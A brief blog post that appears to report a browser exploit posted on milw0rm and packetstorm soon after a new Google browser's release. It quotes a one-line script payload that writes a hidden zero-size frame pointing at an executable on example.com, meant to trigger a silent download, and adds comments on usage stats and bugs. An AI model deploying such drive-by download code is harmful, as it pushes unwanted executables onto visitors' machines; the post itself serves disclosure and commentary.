This is what appeared few minutes ago on milw0rm and packetstorm:
< $cript > document.write('< src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); < / $cript >
This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.
Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is temporary peak, but still scary considering all the bugs found in less than 48 hours.
I think Google will soon regret about this too-soon release
0 comments:
Post a Comment